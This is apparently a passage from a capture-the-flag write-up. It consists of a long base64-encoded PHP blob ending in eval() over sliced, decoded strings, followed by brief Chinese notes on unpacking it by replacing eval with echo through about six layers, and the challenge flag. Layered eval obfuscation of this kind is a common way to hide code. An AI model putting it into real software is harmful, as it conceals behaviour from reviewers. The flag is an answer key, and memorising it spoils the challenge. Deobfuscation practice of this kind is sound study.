jBOS1N6Q2dodk5vOTRVd2hiU0IwcWptR3BiM3VYekVNS2MxMHFqbUdwYjN1WHpFTUtjRTA3akVHR1YyUzRHSjBaaEJrUVBtajBOS2NLTEY0WmhCa1FQbWowTkttQUxGNFpoQmtRUG1qME5LZjBMRjRaaEJrUVBtajBOS21BTEY0WmhCa1FQbWowTktmMExpTVpPTkdWekJ6c0hGaE5OVnpEUHZoYmNFMHFqbUdwYjN1WHpFTXJ5RTBxam1HcGIzdVh6RU1LTEY0WlZCQkxPM3VaTktXekNnaE5OVnpEUHZoYmNWMHFqbUdwYjN1WHpFTWVTRTA3anZCWnoyclNzSzBaaEJrUVBtajBOS3p6Q2dodk5vOTRVd2hiY2lTenllaGFiQnpUczBZcUhGaHZObzk0VXdoYmNEanpDZ2h2Tm85NFV3aGJjS0d6Q2dodk5vOTRVd2hiY0RCekNnaHZObzk0VXdoYmNER3pDZ2h2Tm85NFV3aGJjS1d6Q2dodk5vOTRVd2hiY0tqekNnaHZObzk0VXdoYmNLVnpDZ2h2Tm85NFV3aGJjREd6Q2dodk5vOTRVd2hiY0tXenkyVjJPTkFUanYxcVYydWlGWFlnRlp6cHMxVnFzRGhHUERXa1ZOYTRpMmhJY2loQmJOdW5zWlZwc3ZoRUZCekZjc0d1czF1WnpWa2RjTEJnaEJqTnNpVzBob0VMR3YxQlZvcnJWaVN5UEVFTlVaYVpObWprczB6TnBFenZHZGpnYzFmMXMxek1SQlpyaW81R1ZzRzRPREVGT1ZWRUd2ckZWTGhKVm1zcnMyU2RTVmpOY0JrS3NaR01oRWhJTndrWmNEbTJWMEdwY0JTZFJ2Qk5ORU8wczI1dHN2RWRzRGpoVnZySnMyNU5WMmp2VkJTRFZCanZPMmFNVTJjQXlza2dwM2hmTzFWdHB2U0xpRFNOVm1acmlzenZzMDlPUkVHRmNzamRPRFd0cDJqRWNMQmlWS1Zjc0RTdlUxQk9ob2twYlo1NXMxUjFibTFuYmRFc05FR2pPVkdORkVaZVNOdVpjM1dLTm9ydEZvVnFpd0JpVlo1Y3NaUjFSVmpWR0VFeWhMaGZWc2hGaUJmclV3RUZORUdlc2lqTnMyU05pWkdOY3ZyQVZCVjRjRWpNVkxCR2MzV3ZPMmEwUjJWRUZvYWhjZGhhVm9heXB2aE5VQmtOVk5oMUdKVzBGRWpzaEJHVnAyYTNzMk00U05FSXptdWdiTFd2c0RFV2N2amRObzlnaExoYVZvYXlpdmhPUmRTaWNCa0xzaVcwYlZHSWlacnBiZFdrc0JHTWhFVEFWQldTVnNreUdFelRwMVNmaGlWWk5FamhHbUdORnMwclJkV0dWMWt5VkV6NHp2am5HdjFMVkJrbXNLanBWMW1BenYxTnAwNWNOb3JwaEVjS1ZCRXVic1Y1VnNWcEYxVUtoREdpYlpra09vMTRGRVNkR3Z1U2J2UzVzMXVFU05FRVZCV2lWMnJ2c0RFWnAxU2ZoaVZaTkVqaEdtR05GczByUmRXR1Yxa3lWRXo0enZFbUd2MUxWQmttc0tqcFYxbUF6djFOcDA1SE5CekZoRWNlTkJ6aGNkaGFWb2F5aXZoVnBkVnNORUdoc29yTk5CR01iRUVTYm1mMk8za2pTVkdFemR1WmgycmNzWlZNT1ZVZVNOcnBjZGg0TkRqdEZzMXFod0VpY0VqdE9WR05zRU9BaUJqU3BCanFzS1NaU29qRXp2MU5wMDVjR0VoWFIxa01iRXpoY2RoYVYyYXRpQlVBcEpHaXBLQmVzaVdOaVZWZFJka1NjMWprVkJoamNFbWVWQmhaaEVUMFZEajBVMUdOaFprWmJFR3BzaWp0YlZ6Tk5aaGljQmt1aURqcE5CR0lpWnJwYkVrbXNLanBWMW1laEJTVmhtanlPMmFUUlZjZU5aNVpjMDU1Tk5rTlNtMU5SbXJOYzBzMVYwVkFzb2h2c3dqVmh2dW5OVmhFU1ZzZXptak5wMGtlc1ZHQWkyRTZGd3VWTnZ1NU9va05TdlNhU0pFQkZtazFpQnVUUE5qbmJtQlZjM1dLc0tqcFYxbUF6SkVTaDN1SE5Cemh5c0JuenZyWmJzR0tGMFNEQzFXa08zVnRoS0UxVkRqVFZFU0pHMmFOYnZyT05pU1RwMGFKc291cGJFT2VWREVoYjBrZE5CU1ZiQmYwTkxCM3AyRUxzRFNnaGlFc0Yya2pSbXJKc291cGJFT2VWREVoYjBrZE5CU1ZiQmYwTkxCM3AyRUxzRFNnaGlFc2ltU0ZSRWtmR2RTc1ZaMUFpbVNGcEVrTVZEak5jVkVRRlp6cHMxVnFzRGhHUEx6M2ltU0ZSRWtmR2RTc1ZaMUFGMVNJUm05M0hpMGd0Rlo3SEs0PSI7ZXZhbCgnPz4nLiRhckNpQ0woJFZ2VXJCWigkREVvbUtrKCRWQ0JaUVcsJExucG52WSoyKSwkREVvbUtrKCRWQ0JaUVcsJExucG52WSwkTG5wbnZZKSwkREVvbUtrKCRWQ0JaUVcsMCwkTG5wbnZZKSkpKTs="));?>

硬解 eval变echo的 差不多解个6层

最后可以getflag

flag:

cazy{PHP_ji4m1_1s_s00000_3aSyyyyyyyyyyy}